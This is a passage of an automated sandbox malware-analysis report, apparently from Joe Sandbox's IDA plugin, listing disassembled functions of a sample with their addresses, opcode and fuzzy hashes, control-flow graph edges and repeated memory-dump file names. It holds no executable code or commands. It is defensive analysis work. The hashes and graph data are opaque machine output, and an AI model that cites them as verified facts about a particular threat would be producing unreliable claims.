                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9dc15546d189289bb58969f0ce5e3a176f9824b37ccf2623a59bc87c9584c8a5
                                                            • Instruction ID: a0fcdfa73f450ab90f81265d3a4c2c3e303318fad885da6fd7cf600183867ec4
                                                            • Opcode Fuzzy Hash: 9dc15546d189289bb58969f0ce5e3a176f9824b37ccf2623a59bc87c9584c8a5
                                                            • Instruction Fuzzy Hash: 53919D75200B01CFD724CF25E894A26B7F6FF89314B118A6CE8568BBA1DB30E859DF50
                                                            Function 00540228 Relevance: .2, Instructions: 218COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 451 540228-54023b 452 540356 451->452 453 540417-540430 451->453 454 540370-54037e 451->454 455 5403d0-5403d7 451->455 456 540311-540332 451->456 457 540472-540477 451->457 458 540393-540397 451->458 459 5403be 451->459 460 5403de-5403e3 451->460 461 54035f-540367 451->461 462 540339-54034f 451->462 463 54045b-540469 call 575700 451->463 464 5403fb-540414 451->464 465 540246-540260 451->465 466 540386-54038c 451->466 467 540440-540458 call 575700 451->467 468 540480 451->468 469 540242-540244 451->469 470 540482-540484 451->470 471 5403ec-5403f4 451->471 472 540308-54030c 451->472 452->461 453->467 454->466 455->453 455->457 455->458 455->460 455->464 455->466 455->468 455->470 455->471 456->452 456->453 456->454 456->455 456->457 456->458 456->459 456->460 456->461 456->462 456->463 456->464 456->466 456->467 456->468 456->470 456->471 457->468 479 5403a0-5403b7 458->479 459->455 460->471 461->454 462->452 462->453 462->454 462->455 462->457 462->458 462->459 462->460 462->461 462->463 462->464 462->466 462->467 462->468 462->470 462->471 463->457 464->453 474 540294 465->474 475 540262 465->475 466->457 466->458 466->468 466->470 467->463 473 540296-5402bd 469->473 477 54048d-540b30 470->477 471->457 471->458 471->464 471->468 471->470 472->477 481 5402bf 473->481 482 5402ea-540301 473->482 474->473 480 540270-540292 call 542eb0 475->480 479->453 479->455 479->457 479->458 479->459 479->460 479->463 479->464 479->466 479->467 479->468 479->470 479->471 480->474 490 5402c0-5402e8 call 542e70 481->490 482->452 482->453 482->454 482->455 482->456 482->457 482->458 482->459 482->460 482->461 482->462 482->463 482->464 482->466 482->467 482->468 482->470 482->471 482->472 490->482
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd806ca5b8fec160f5f9ec19a17a7935a282f2893abedefbbb2e5bca0d4fc32b
                                                            • Instruction ID: 8b845502372ba8830b8978098b720a5e00edfa08ef79ccc5846506add09c26a4
                                                            • Opcode Fuzzy Hash: dd806ca5b8fec160f5f9ec19a17a7935a282f2893abedefbbb2e5bca0d4fc32b
                                                            • Instruction Fuzzy Hash: 75718C74204701DFD724CF20E898A26BBF6FF89314F10896CE94A876A2D771A859EF50
                                                            Function 0053D110 Relevance: .2, Instructions: 168COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 500 53d110-53d11b call 574cc0 503 53d121-53d130 call 56c8d0 500->503 504 53d2ee-53d2f6 500->504 509 53d136-53d15f 503->509 510 53d2e9 call 5756e0 503->510 514 53d161 509->514 515 53d196-53d1bf 509->515 510->504 518 53d170-53d194 call 53d300 514->518 516 53d1c1 515->516 517 53d1f6-53d20c 515->517 519 53d1d0-53d1f4 call 53d370 516->519 520 53d239-53d23b 517->520 521 53d20e-53d20f 517->521 518->515 519->517 526 53d286-53d2aa 520->526 527 53d23d-53d25a 520->527 525 53d210-53d237 call 53d3e0 521->525 525->520 528 53d2d6-53d2dd call 53e8f0 526->528 529 53d2ac-53d2af 526->529 527->526 532 53d25c-53d25f 527->532 528->510 542 53d2df call 542f10 528->542 533 53d2b0-53d2d4 call 53d490 529->533 536 53d260-53d284 call 53d440 532->536 533->528 536->526 544 53d2e4 call 540b40 542->544 544->510
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e8dc9199e988cb6cfff33b5f56ae7206554132d84444d3fdcbe78bc17107ac7
                                                            • Instruction ID: 6375be73efdd99c08c5ac993d8db5e1921ea66ac9e6de08fb12085b91c422138
                                                            • Opcode Fuzzy Hash: 6e8dc9199e988cb6cfff33b5f56ae7206554132d84444d3fdcbe78bc17107ac7
                                                            • Instruction Fuzzy Hash: F641217440D380ABD701AB68E588A2EFFF5BF92704F148C0CE5C49B252C33AD8249B67
                                                            Function 005799D0 Relevance: .1, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb6ace61e993b0999be0f6fe06079a425d56f4101dbe4d93a3e27e02ca68f215
                                                            • Instruction ID: 3ca2c97171269f39c5cae2ebebf16d0d1bcd668efe5d20f75d6ffc2f5ecc7706
                                                            • Opcode Fuzzy Hash: bb6ace61e993b0999be0f6fe06079a425d56f4101dbe4d93a3e27e02ca68f215
                                                            • Instruction Fuzzy Hash: 66417C34209300ABD714DA15E890F2BFBB6FB85754F64C82CF98E97251E331E801EB62
                                                            Function 005700D0 Relevance: .1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49cbf2ed76a800fa5fc6030ff0b6c9ff89f1af1789fe71090c89ca86ff5befe9
                                                            • Instruction ID: 54e5b02297aabd80443934e65fcfe0197127b3422ab21597ee9ab29bf7d5d9d1
                                                            • Opcode Fuzzy Hash: 49cbf2ed76a800fa5fc6030ff0b6c9ff89f1af1789fe71090c89ca86ff5befe9
                                                            • Instruction Fuzzy Hash: AA21FC3250C3508BC7195E29AC9022EBFD2BBC5320F9AD93EE99E4B3C1D5359D40E391
                                                            Function 00540EEC Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
